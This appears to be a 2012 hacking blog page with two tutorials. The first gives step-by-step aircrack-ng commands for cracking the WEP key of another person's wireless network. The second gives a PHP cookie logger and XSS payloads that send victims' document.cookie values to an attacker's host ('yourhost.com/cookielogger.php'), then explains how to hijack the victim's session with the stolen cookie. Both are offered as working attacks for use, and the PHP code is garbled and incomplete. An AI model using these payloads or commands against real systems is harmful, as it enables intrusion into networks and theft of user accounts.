Gear yourself up....

Sunday 9 September 2012


          Wireless Hacking with backtrack 3 or Any of it Version is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :

- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card(ALPHA/DLINK Wireless Adapters)

And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.

Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.

Ok let’s start!
Commands | Meaning

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down

* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/


            In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

function GetIP()
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = "unknown";

function logData()
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");



Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573